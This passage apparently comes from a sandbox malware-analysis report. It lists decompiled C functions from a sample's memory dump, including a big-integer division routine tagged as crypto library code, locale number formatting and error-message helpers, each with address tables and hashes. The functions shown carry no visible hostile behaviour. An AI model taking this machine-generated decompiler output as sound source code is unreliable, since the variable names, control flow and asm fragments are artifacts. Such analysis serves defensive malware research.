									_t104 = _t57;
								}
								__eflags = _t111 - 0xffffffff;
								if(_t111 != 0xffffffff) {
									FindClose(_t111);
								}
								_t58 = _t104;
							} else {
								__eflags = _t87 -  &(_t78[1]);
								if(_t87 ==  &(_t78[1])) {
									goto L19;
								} else {
									_push(_t110);
									_t58 = E003FB348(_t87, _t78, 0, 0);
								}
							}
							_pop(_t105);
							_pop(_t112);
							__eflags = _v12 ^ _t116;
							_pop(_t79);
							return E003EFBBC(_t58, _t79, _v12 ^ _t116, _t101, _t105, _t112);
						} else {
							goto L6;
						}
					}
				} else {
					_t73 = 0xc;
					L8:
					return _t73;
				}
				L40:
			}






















































                0x003fb34d
                0x003fb34e
                0x003fb351
                0x003fb351
                0x003fb354
                0x003fb354
                0x003fb356
                0x003fb357
                0x003fb361
                0x003fb364
                0x003fb367
                0x003fb36c
                0x003fb375
                0x003fb378
                0x003fb382
                0x003fb385
                0x003fb386
                0x003fb388
                0x003fb39c
                0x003fb39c
                0x003fb39f
                0x003fb3a9
                0x003fb3ae
                0x003fb3b1
                0x003fb3b3
                0x00000000
                0x003fb3b5
                0x003fb3b9
                0x003fb3c2
                0x003fb3c8
                0x00000000
                0x003fb3cb
                0x003fb38a
                0x003fb38a
                0x003fb390
                0x003fb395
                0x003fb398
                0x003fb39a
                0x003fb3d1
                0x003fb3d3
                0x003fb3d4
                0x003fb3d5
                0x003fb3d6
                0x003fb3d7
                0x003fb3d8
                0x003fb3dd
                0x003fb3e1
                0x003fb3e3
                0x003fb3e9
                0x003fb3f0
                0x003fb3f3
                0x003fb3f6
                0x003fb3f7
                0x003fb3fa
                0x003fb3fb
                0x003fb3fe
                0x003fb3ff
                0x003fb420
                0x003fb420
                0x003fb422
                0x00000000
                0x00000000
                0x003fb407
                0x003fb409
                0x003fb40b
                0x003fb40d
                0x003fb40f
                0x003fb411
                0x003fb413
                0x003fb41e
                0x00000000
                0x003fb41e
                0x003fb413
                0x003fb40f
                0x00000000
                0x003fb40b
                0x003fb424
                0x003fb426
                0x003fb429
                0x003fb442
                0x003fb442
                0x003fb444
                0x003fb447
                0x003fb457
                0x003fb459
                0x003fb459
                0x003fb449
                0x003fb449
                0x003fb44c
                0x00000000
                0x003fb44e
                0x003fb44e
                0x003fb451
                0x00000000
                0x003fb453
                0x003fb453
                0x003fb453
                0x003fb451
                0x003fb44c
                0x003fb45f
                0x003fb467
                0x003fb46b
                0x003fb479
                0x003fb47e
                0x003fb493
                0x003fb495
                0x003fb49b
                0x003fb49e
                0x003fb4d0
                0x003fb4d0
                0x003fb4d2
                0x003fb4d5
                0x003fb4db
                0x003fb4db
                0x003fb4e2
                0x003fb4fc
                0x003fb4fc
                0x003fb50b
                0x003fb510
                0x003fb513
                0x003fb515
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003fb4e4
                0x003fb4e4
                0x003fb4ea
                0x003fb4ec
                0x00000000
                0x003fb4ee
                0x003fb4ee
                0x003fb4f1
                0x00000000
                0x003fb4f3
                0x003fb4f3
                0x003fb4fa
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003fb4fa
                0x003fb4f1
                0x003fb4ec
                0x00000000
                0x003fb517
                0x003fb51f
                0x003fb525
                0x003fb527
                0x003fb527
                0x003fb52f
                0x003fb534
                0x003fb53c
                0x003fb53f
                0x003fb541
                0x003fb555
                0x003fb55a
                0x003fb4a0
                0x003fb4a0
                0x003fb4a4
                0x003fb4ac
                0x003fb4ac
                0x003fb4ac
                0x003fb4ae
                0x003fb4b1
                0x003fb4b4
                0x003fb4b4
                0x003fb4ba
                0x003fb42b
                0x003fb42e
                0x003fb430
                0x00000000
                0x003fb432
                0x003fb432
                0x003fb438
                0x003fb43d
                0x003fb430
                0x003fb4bf
                0x003fb4c0
                0x003fb4c1
                0x003fb4c3
                0x003fb4cc
                0x00000000
                0x00000000
                0x00000000
                0x003fb39a
                0x003fb36e
                0x003fb370
                0x003fb3cc
                0x003fb3d0
                0x003fb3d0
                0x00000000

                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID:
                • String ID: .
                • API String ID: 0-248832578
                • Opcode ID: 96551e5f66f283c81a2bfcd9bfaf0a96bc07bb2d7e23eb3d86b7c2f5ec8ec8da
                • Instruction ID: c96008e95d1b9a699da0329c90c9992b3910ba89d39f260318a26139b4f44be5
                • Opcode Fuzzy Hash: 96551e5f66f283c81a2bfcd9bfaf0a96bc07bb2d7e23eb3d86b7c2f5ec8ec8da
                • Instruction Fuzzy Hash: 883105B190024DAFCB269E79CC84EFBBBBDDB85304F1501A9FA1897252E7309E458B50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003FD440 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODECrypto
                Download Yara Rule
                C-Code - Quality: 90%
                			E003FD440(signed int* _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int* _v80;
				char _v540;
				signed int _v544;
				signed int _t197;
				signed int _t198;
				signed int* _t200;
				signed int _t201;
				signed int _t204;
				signed int _t206;
				signed int _t208;
				signed int _t209;
				signed int _t213;
				signed int _t219;
				intOrPtr _t225;
				void* _t228;
				signed int _t230;
				signed int _t247;
				signed int _t250;
				void* _t253;
				signed int _t256;
				signed int* _t262;
				signed int _t263;
				signed int _t264;
				void* _t265;
				intOrPtr* _t266;
				signed int _t267;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				signed int* _t274;
				signed int* _t278;
				signed int _t279;
				signed int _t280;
				intOrPtr _t282;
				void* _t286;
				signed char _t292;
				signed int _t295;
				signed int _t303;
				signed int _t306;
				signed int _t307;
				signed int _t309;
				signed int _t311;
				signed int _t313;
				intOrPtr* _t314;
				signed int _t318;
				signed int _t322;
				signed int* _t328;
				signed int _t330;
				signed int _t331;
				signed int _t333;
				void* _t334;
				signed int _t336;
				signed int _t338;
				signed int _t341;
				signed int _t342;
				signed int* _t344;
				signed int _t349;
				signed int _t351;
				void* _t355;
				signed int _t359;
				signed int _t360;
				signed int _t362;
				signed int* _t368;
				signed int* _t369;
				signed int* _t370;
				signed int* _t373;

				_t262 = _a4;
				_t197 =  *_t262;
				if(_t197 != 0) {
					_t328 = _a8;
					_t267 =  *_t328;
					__eflags = _t267;
					if(_t267 != 0) {
						_t3 = _t197 - 1; // -1
						_t349 = _t3;
						_t4 = _t267 - 1; // -1
						_t198 = _t4;
						_v16 = _t349;
						__eflags = _t198;
						if(_t198 != 0) {
							__eflags = _t198 - _t349;
							if(_t198 > _t349) {
								L23:
								__eflags = 0;
								return 0;
							} else {
								_t46 = _t198 + 1; // 0x0
								_t306 = _t349 - _t198;
								_v60 = _t46;
								_t269 = _t349;
								__eflags = _t349 - _t306;
								if(_t349 < _t306) {
									L21:
									_t306 = _t306 + 1;
									__eflags = _t306;
								} else {
									_t368 =  &(_t262[_t349 + 1]);
									_t341 =  &(( &(_t328[_t269 - _t306]))[1]);
									__eflags = _t341;
									while(1) {
										__eflags =  *_t341 -  *_t368;
										if( *_t341 !=  *_t368) {
											break;
										}
										_t269 = _t269 - 1;
										_t341 = _t341 - 4;
										_t368 = _t368 - 4;
										__eflags = _t269 - _t306;
										if(_t269 >= _t306) {
											continue;
										} else {
											goto L21;
										}
										goto L22;
									}
									_t369 = _a8;
									_t54 = (_t269 - _t306) * 4; // 0xfc23b5a
									__eflags =  *((intOrPtr*)(_t369 + _t54 + 4)) -  *((intOrPtr*)(_t262 + 4 + _t269 * 4));
									if( *((intOrPtr*)(_t369 + _t54 + 4)) <  *((intOrPtr*)(_t262 + 4 + _t269 * 4))) {
										goto L21;
									}
								}
								L22:
								__eflags = _t306;
								if(__eflags != 0) {
									_t330 = _v60;
									_t200 = _a8;
									_t351 =  *(_t200 + _t330 * 4);
									_t64 = _t330 * 4; // 0xffffe9e5
									_t201 =  *((intOrPtr*)(_t200 + _t64 - 4));
									_v36 = _t201;
									asm("bsr eax, esi");
									_v56 = _t351;
									if(__eflags == 0) {
										_t270 = 0x20;
									} else {
										_t270 = 0x1f - _t201;
									}
									_v40 = _t270;
									_v64 = 0x20 - _t270;
									__eflags = _t270;
									if(_t270 != 0) {
										_t292 = _v40;
										_v36 = _v36 << _t292;
										_v56 = _t351 << _t292 | _v36 >> _v64;
										__eflags = _t330 - 2;
										if(_t330 > 2) {
											_t79 = _t330 * 4; // 0xe850ffff
											_t81 =  &_v36;
											 *_t81 = _v36 |  *(_a8 + _t79 - 8) >> _v64;
											__eflags =  *_t81;
										}
									}
									_v76 = 0;
									_t307 = _t306 + 0xffffffff;
									__eflags = _t307;
									_v32 = _t307;
									if(_t307 < 0) {
										_t331 = 0;
										__eflags = 0;
									} else {
										_t85 =  &(_t262[1]); // 0x4
										_v20 =  &(_t85[_t307]);
										_t206 = _t307 + _t330;
										_t90 = _t262 - 4; // -4
										_v12 = _t206;
										_t278 = _t90 + _t206 * 4;
										_v80 = _t278;
										do {
											__eflags = _t206 - _v16;
											if(_t206 > _v16) {
												_t207 = 0;
												__eflags = 0;
											} else {
												_t207 = _t278[2];
											}
											__eflags = _v40;
											_t311 = _t278[1];
											_t279 =  *_t278;
											_v52 = _t207;
											_v44 = 0;
											_v8 = _t207;
											_v24 = _t279;
											if(_v40 > 0) {
												_t318 = _v8;
												_t336 = _t279 >> _v64;
												_t230 = E003EF0C0(_t311, _v40, _t318);
												_t279 = _v40;
												_t207 = _t318;
												_t311 = _t336 | _t230;
												_t359 = _v24 << _t279;
												__eflags = _v12 - 3;
												_v8 = _t318;
												_v24 = _t359;
												if(_v12 >= 3) {
													_t279 = _v64;
													_t360 = _t359 |  *(_t262 + (_v60 + _v32) * 4 - 8) >> _t279;
													__eflags = _t360;
													_t207 = _v8;
													_v24 = _t360;
												}
											}
											_t208 = E004021C0(_t311, _t207, _v56, 0);
											_v44 = _t262;
											_t263 = _t208;
											_v44 = 0;
											_t209 = _t311;
											_v8 = _t263;
											_v28 = _t209;
											_t333 = _t279;
											_v72 = _t263;
											_v68 = _t209;
											__eflags = _t209;
											if(_t209 != 0) {
												L40:
												_t264 = _t263 + 1;
												asm("adc eax, 0xffffffff");
												_t333 = _t333 + E003EF0E0(_t264, _t209, _v56, 0);
												asm("adc esi, edx");
												_t263 = _t264 | 0xffffffff;
												_t209 = 0;
												__eflags = 0;
												_v44 = 0;
												_v8 = _t263;
												_v72 = _t263;
												_v28 = 0;
												_v68 = 0;
											} else {
												__eflags = _t263 - 0xffffffff;
												if(_t263 > 0xffffffff) {
													goto L40;
												}
											}
											__eflags = 0;
											if(0 <= 0) {
												if(0 < 0) {
													goto L44;
												} else {
													__eflags = _t333 - 0xffffffff;
													if(_t333 <= 0xffffffff) {
														while(1) {
															L44:
															_v8 = _v24;
															_t228 = E003EF0E0(_v36, 0, _t263, _t209);
															__eflags = _t311 - _t333;
															if(__eflags < 0) {
																break;
															}
															if(__eflags > 0) {
																L47:
																_t209 = _v28;
																_t263 = _t263 + 0xffffffff;
																_v72 = _t263;
																asm("adc eax, 0xffffffff");
																_t333 = _t333 + _v56;
																__eflags = _t333;
																_v28 = _t209;
																asm("adc dword [ebp-0x28], 0x0");
																_v68 = _t209;
																if(_t333 == 0) {
																	__eflags = _t333 - 0xffffffff;
																	if(_t333 <= 0xffffffff) {
																		continue;
																	} else {
																	}
																}
															} else {
																__eflags = _t228 - _v8;
																if(_t228 <= _v8) {
																	break;
																} else {
																	goto L47;
																}
															}
															L51:
															_v8 = _t263;
															goto L52;
														}
														_t209 = _v28;
														goto L51;
													}
												}
											}
											L52:
											__eflags = _t209;
											if(_t209 != 0) {
												L54:
												_t280 = _v60;
												_t334 = 0;
												_t355 = 0;
												__eflags = _t280;
												if(_t280 != 0) {
													_t266 = _v20;
													_t219 =  &(_a8[1]);
													__eflags = _t219;
													_v24 = _t219;
													_v16 = _t280;
													do {
														_v44 =  *_t219;
														_t225 =  *_t266;
														_t286 = _t334 + _v72 * _v44;
														asm("adc esi, edx");
														_t334 = _t355;
														_t355 = 0;
														__eflags = _t225 - _t286;
														if(_t225 < _t286) {
															_t334 = _t334 + 1;
															asm("adc esi, esi");
														}
														 *_t266 = _t225 - _t286;
														_t266 = _t266 + 4;
														_t219 = _v24 + 4;
														_t164 =  &_v16;
														 *_t164 = _v16 - 1;
														__eflags =  *_t164;
														_v24 = _t219;
													} while ( *_t164 != 0);
													_t263 = _v8;
													_t280 = _v60;
												}
												__eflags = 0 - _t355;
												if(__eflags <= 0) {
													if(__eflags < 0) {
														L63:
														__eflags = _t280;
														if(_t280 != 0) {
															_t338 = _t280;
															_t314 = _v20;
															_t362 =  &(_a8[1]);
															__eflags = _t362;
															_t265 = 0;
															do {
																_t282 =  *_t314;
																_t172 = _t362 + 4; // 0xa6a5959
																_t362 = _t172;
																_t314 = _t314 + 4;
																asm("adc eax, eax");
																 *((intOrPtr*)(_t314 - 4)) = _t282 +  *((intOrPtr*)(_t362 - 4)) + _t265;
																asm("adc eax, 0x0");
																_t265 = 0;
																_t338 = _t338 - 1;
																__eflags = _t338;
															} while (_t338 != 0);
															_t263 = _v8;
														}
														_t263 = _t263 + 0xffffffff;
														asm("adc dword [ebp-0x18], 0xffffffff");
													} else {
														__eflags = _v52 - _t334;
														if(_v52 < _t334) {
															goto L63;
														}
													}
												}
												_t213 = _v12 - 1;
												__eflags = _t213;
												_v16 = _t213;
											} else {
												__eflags = _t263;
												if(_t263 != 0) {
													goto L54;
												}
											}
											_t331 = 0 + _t263;
											asm("adc esi, 0x0");
											_v20 = _v20 - 4;
											_t313 = _v32 - 1;
											_t262 = _a4;
											_t278 = _v80 - 4;
											_t206 = _v12 - 1;
											_v76 = _t331;
											_v32 = _t313;
											_v80 = _t278;
											_v12 = _t206;
											__eflags = _t313;
										} while (_t313 >= 0);
									}
									_t309 = _v16 + 1;
									_t204 = _t309;
									__eflags = _t204 -  *_t262;
									if(_t204 <  *_t262) {
										_t191 = _t204 + 1; // 0x3fea5d
										_t274 =  &(_t262[_t191]);
										do {
											 *_t274 = 0;
											_t194 =  &(_t274[1]); // 0x91850fc2
											_t274 = _t194;
											_t204 = _t204 + 1;
											__eflags = _t204 -  *_t262;
										} while (_t204 <  *_t262);
									}
									 *_t262 = _t309;
									__eflags = _t309;
									if(_t309 != 0) {
										while(1) {
											_t271 =  *_t262;
											__eflags = _t262[_t271];
											if(_t262[_t271] != 0) {
												goto L78;
											}
											_t272 = _t271 + 0xffffffff;
											__eflags = _t272;
											 *_t262 = _t272;
											if(_t272 != 0) {
												continue;
											}
											goto L78;
										}
									}
									L78:
									return _t331;
								} else {
									goto L23;
								}
							}
						} else {
							_t6 =  &(_t328[1]); // 0xfc23b5a
							_t295 =  *_t6;
							_v44 = _t295;
							__eflags = _t295 - 1;
							if(_t295 != 1) {
								__eflags = _t349;
								if(_t349 != 0) {
									_t342 = 0;
									_v12 = 0;
									_v8 = 0;
									_v20 = 0;
									__eflags = _t349 - 0xffffffff;
									if(_t349 != 0xffffffff) {
										_t250 = _v16 + 1;
										__eflags = _t250;
										_v32 = _t250;
										_t373 =  &(_t262[_t349 + 1]);
										do {
											_t253 = E004021C0( *_t373, _t342, _t295, 0);
											_v68 = _t303;
											_t373 = _t373 - 4;
											_v20 = _t262;
											_t342 = _t295;
											_t303 = 0 + _t253;
											asm("adc ecx, 0x0");
											_v12 = _t303;
											_t34 =  &_v32;
											 *_t34 = _v32 - 1;
											__eflags =  *_t34;
											_v8 = _v12;
											_t295 = _v44;
										} while ( *_t34 != 0);
										_t262 = _a4;
									}
									_v544 = 0;
									_t41 =  &(_t262[1]); // 0x4
									_t370 = _t41;
									 *_t262 = 0;
									E003FBDE1(_t370, 0x1cc,  &_v540, 0);
									_t247 = _v20;
									__eflags = 0 - _t247;
									 *_t370 = _t342;
									_t262[2] = _t247;
									asm("sbb ecx, ecx");
									__eflags =  ~0x00000000;
									 *_t262 = 0xbadbae;
									return _v12;
								} else {
									_t14 =  &(_t262[1]); // 0x4
									_t344 = _t14;
									_v544 = 0;
									 *_t262 = 0;
									E003FBDE1(_t344, 0x1cc,  &_v540, 0);
									_t256 = _t262[1];
									_t322 = _t256 % _v44;
									__eflags = 0 - _t322;
									 *_t344 = _t322;
									asm("sbb ecx, ecx");
									__eflags = 0;
									 *_t262 =  ~0x00000000;
									return _t256 / _v44;
								}
							} else {
								_t9 =  &(_t262[1]); // 0x4
								_v544 = _t198;
								 *_t262 = _t198;
								E003FBDE1(_t9, 0x1cc,  &_v540, _t198);
								__eflags = 0;
								return _t262[1];
							}
						}
					} else {
						__eflags = 0;
						return 0;
					}
				} else {
					return _t197;
				}
			}























































































                0x003fd44c
                0x003fd44f
                0x003fd453
                0x003fd45d
                0x003fd460
                0x003fd462
                0x003fd464
                0x003fd471
                0x003fd471
                0x003fd474
                0x003fd474
                0x003fd477
                0x003fd47a
                0x003fd47c
                0x003fd5af
                0x003fd5b1
                0x003fd5fa
                0x003fd5fe
                0x003fd604
                0x003fd5b3
                0x003fd5b5
                0x003fd5b8
                0x003fd5ba
                0x003fd5bd
                0x003fd5bf
                0x003fd5c1
                0x003fd5f5
                0x003fd5f5
                0x003fd5f5
                0x003fd5c3
                0x003fd5c8
                0x003fd5ce
                0x003fd5ce
                0x003fd5d1
                0x003fd5d3
                0x003fd5d5
                0x00000000
                0x00000000
                0x003fd5d7
                0x003fd5d8
                0x003fd5db
                0x003fd5de
                0x003fd5e0
                0x00000000
                0x003fd5e2
                0x00000000
                0x003fd5e2
                0x00000000
                0x003fd5e0
                0x003fd5e4
                0x003fd5eb
                0x003fd5ef
                0x003fd5f3
                0x00000000
                0x00000000
                0x003fd5f3
                0x003fd5f6
                0x003fd5f6
                0x003fd5f8
                0x003fd605
                0x003fd608
                0x003fd60b
                0x003fd60e
                0x003fd60e
                0x003fd612
                0x003fd615
                0x003fd618
                0x003fd61b
                0x003fd626
                0x003fd61d
                0x003fd622
                0x003fd622
                0x003fd630
                0x003fd635
                0x003fd638
                0x003fd63a
                0x003fd644
                0x003fd647
                0x003fd64e
                0x003fd651
                0x003fd654
                0x003fd65c
                0x003fd662
                0x003fd662
                0x003fd662
                0x003fd662
                0x003fd654
                0x003fd667
                0x003fd66e
                0x003fd66e
                0x003fd671
                0x003fd674
                0x003fd8a6
                0x003fd8a6
                0x003fd67a
                0x003fd67a
                0x003fd680
                0x003fd683
                0x003fd686
                0x003fd689
                0x003fd68c
                0x003fd68f
                0x003fd692
                0x003fd692
                0x003fd695
                0x003fd69c
                0x003fd69c
                0x003fd697
                0x003fd697
                0x003fd697
                0x003fd69e
                0x003fd6a2
                0x003fd6a5
                0x003fd6a7
                0x003fd6aa
                0x003fd6b1
                0x003fd6b4
                0x003fd6b7
                0x003fd6c2
                0x003fd6c5
                0x003fd6ca
                0x003fd6cf
                0x003fd6d6
                0x003fd6db
                0x003fd6dd
                0x003fd6df
                0x003fd6e3
                0x003fd6e6
                0x003fd6e9
                0x003fd6f1
                0x003fd6fa
                0x003fd6fa
                0x003fd6fc
                0x003fd6ff
                0x003fd6ff
                0x003fd6e9
                0x003fd709
                0x003fd70e
                0x003fd713
                0x003fd715
                0x003fd718
                0x003fd71a
                0x003fd71d
                0x003fd720
                0x003fd722
                0x003fd725
                0x003fd728
                0x003fd72a
                0x003fd731
                0x003fd736
                0x003fd739
                0x003fd743
                0x003fd745
                0x003fd747
                0x003fd74a
                0x003fd74a
                0x003fd74c
                0x003fd74f
                0x003fd752
                0x003fd755
                0x003fd758
                0x003fd72c
                0x003fd72c
                0x003fd72f
                0x00000000
                0x00000000
                0x003fd72f
                0x003fd75b
                0x003fd75d
                0x003fd75f
                0x00000000
                0x003fd761
                0x003fd761
                0x003fd764
                0x003fd766
                0x003fd766
                0x003fd774
                0x003fd777
                0x003fd77c
                0x003fd77e
                0x00000000
                0x00000000
                0x003fd780
                0x003fd787
                0x003fd787
                0x003fd78a
                0x003fd78d
                0x003fd790
                0x003fd793
                0x003fd793
                0x003fd796
                0x003fd799
                0x003fd79d
                0x003fd7a0
                0x003fd7a2
                0x003fd7a5
                0x00000000
                0x00000000
                0x003fd7a7
                0x003fd7a5
                0x003fd782
                0x003fd782
                0x003fd785
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003fd785
                0x003fd7ac
                0x003fd7ac
                0x00000000
                0x003fd7ac
                0x003fd7a9
                0x00000000
                0x003fd7a9
                0x003fd764
                0x003fd75f
                0x003fd7af
                0x003fd7af
                0x003fd7b1
                0x003fd7bb
                0x003fd7bb
                0x003fd7be
                0x003fd7c0
                0x003fd7c2
                0x003fd7c4
                0x003fd7c9
                0x003fd7cc
                0x003fd7cc
                0x003fd7cf
                0x003fd7d2
                0x003fd7d5
                0x003fd7d7
                0x003fd7ec
                0x003fd7ee
                0x003fd7f0
                0x003fd7f2
                0x003fd7f4
                0x003fd7f6
                0x003fd7f8
                0x003fd7fa
                0x003fd7fd
                0x003fd7fd
                0x003fd801
                0x003fd803
                0x003fd809
                0x003fd80c
                0x003fd80c
                0x003fd80c
                0x003fd810
                0x003fd810
                0x003fd815
                0x003fd818
                0x003fd818
                0x003fd81d
                0x003fd81f
                0x003fd821
                0x003fd828
                0x003fd828
                0x003fd82a
                0x003fd82f
                0x003fd831
                0x003fd834
                0x003fd834
                0x003fd837
                0x003fd840
                0x003fd840
                0x003fd842
                0x003fd842
                0x003fd847
                0x003fd84d
                0x003fd851
                0x003fd854
                0x003fd857
                0x003fd859
                0x003fd859
                0x003fd859
                0x003fd85e
                0x003fd85e
                0x003fd861
                0x003fd864
                0x003fd823
                0x003fd823
                0x003fd826
                0x00000000
                0x00000000
                0x003fd826
                0x003fd821
                0x003fd86b
                0x003fd86b
                0x003fd86c
                0x003fd7b3
                0x003fd7b3
                0x003fd7b5
                0x00000000
                0x00000000
                0x003fd7b5
                0x003fd87c
                0x003fd881
                0x003fd884
                0x003fd888
                0x003fd889
                0x003fd88c
                0x003fd88f
                0x003fd890
                0x003fd893
                0x003fd896
                0x003fd899
                0x003fd89c
                0x003fd89c
                0x003fd8a4
                0x003fd8ab
                0x003fd8ac
                0x003fd8ae
                0x003fd8b0
                0x003fd8b2
                0x003fd8b5
                0x003fd8c0
                0x003fd8c0
                0x003fd8c6
                0x003fd8c6
                0x003fd8c9
                0x003fd8ca
                0x003fd8ca
                0x003fd8c0
                0x003fd8ce
                0x003fd8d0
                0x003fd8d2
                0x003fd8d4
                0x003fd8d4
                0x003fd8d6
                0x003fd8da
                0x00000000
                0x00000000
                0x003fd8dc
                0x003fd8dc
                0x003fd8df
                0x003fd8e1
                0x00000000
                0x00000000
                0x00000000
                0x003fd8e1
                0x003fd8d4
                0x003fd8e3
                0x003fd8ed
                0x00000000
                0x00000000
                0x00000000
                0x003fd5f8
                0x003fd482
                0x003fd482
                0x003fd482
                0x003fd485
                0x003fd488
                0x003fd48b
                0x003fd4bc
                0x003fd4be
                0x003fd509
                0x003fd50b
                0x003fd512
                0x003fd519
                0x003fd51c
                0x003fd51f
                0x003fd525
                0x003fd525
                0x003fd526
                0x003fd529
                0x003fd530
                0x003fd539
                0x003fd53e
                0x003fd541
                0x003fd546
                0x003fd549
                0x003fd54b
                0x003fd550
                0x003fd553
                0x003fd556
                0x003fd556
                0x003fd556
                0x003fd55a
                0x003fd55d
                0x003fd55d
                0x003fd562
                0x003fd562
                0x003fd56d
                0x003fd578
                0x003fd578
                0x003fd57b
                0x003fd587
                0x003fd58c
                0x003fd597
                0x003fd599
                0x003fd59b
                0x003fd5a1
                0x003fd5a6
                0x003fd5a8
                0x003fd5ae
                0x003fd4c0
                0x003fd4cc
                0x003fd4cc
                0x003fd4cf
                0x003fd4df
                0x003fd4e5
                0x003fd4ec
                0x003fd4ee
                0x003fd4f6
                0x003fd4f8
                0x003fd4fa
                0x003fd4ff
                0x003fd502
                0x003fd508
                0x003fd508
                0x003fd48d
                0x003fd490
                0x003fd494
                0x003fd49a
                0x003fd4a9
                0x003fd4b3
                0x003fd4bb
                0x003fd4bb
                0x003fd48b
                0x003fd466
                0x003fd469
                0x003fd46f
                0x003fd46f
                0x003fd455
                0x003fd45b
                0x003fd45b

                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                • Instruction ID: e722e6d3094be1145e4c39d300d5fa0e81cf88d0313794f5921fb542c9e3eeb4
                • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                • Instruction Fuzzy Hash: 83022C71E002199FDF15DFA9C8846ADF7F2EF88314F258269D919EB384D731AE458B80
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EAF0F Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E003EAF0F(signed int _a4, signed int _a8, short* _a12, int _a16) {
				short _v104;
				short _v304;
				short* _t23;
				int _t24;

				if( *0x40e73c == 0) {
					GetLocaleInfoW(0x400, 0xf,  &_v304, 0x64);
					 *0x42fcb0 = _v304;
					 *0x42fcb2 = 0;
					 *0x40e73c = 0x42fcb0;
				}
				E003E04BD(_a4, _a8,  &_v104, 0x32);
				_t23 = _a12;
				_t24 = _a16;
				 *_t23 = 0;
				GetNumberFormatW(0x400, 0,  &_v104, 0x40e72c, _t23, _t24);
				 *((short*)(_t23 + _t24 * 2 - 2)) = 0;
				return 0;
			}







                0x003eaf27
                0x003eaf35
                0x003eaf42
                0x003eaf4a
                0x003eaf50
                0x003eaf50
                0x003eaf66
                0x003eaf6b
                0x003eaf70
                0x003eaf7a
                0x003eaf84
                0x003eaf8c
                0x003eaf95

                APIs
                • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 003EAF35
                • GetNumberFormatW.KERNEL32 ref: 003EAF84
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: FormatInfoLocaleNumber
                • String ID:
                • API String ID: 2169056816-0
                • Opcode ID: 5756a6600c3009a1f13d9810682d7de8450ec2aec8e97a52afbbfb9a46044ac9
                • Instruction ID: b6af697ccf6476bbea2e8865fcfa34fa5752db76866ddd515871846763921fb0
                • Opcode Fuzzy Hash: 5756a6600c3009a1f13d9810682d7de8450ec2aec8e97a52afbbfb9a46044ac9
                • Instruction Fuzzy Hash: 7C01713A210358AAD7119F76ED45F9A77BCFF08710F404432FA05A7190D370A929CBA9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003D6C74 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E003D6C74(WCHAR* _a4, long _a8) {
				long _t5;

				_t5 = GetLastError();
				if(_t5 == 0) {
					return 0;
				}
				return FormatMessageW(0x1200, 0, _t5, 0x400, _a4, _a8, 0) & 0xffffff00 | _t7 != 0x00000000;
			}




                0x003d6c74
                0x003d6c7c
                0x00000000
                0x003d6ca2
                0x00000000

                APIs
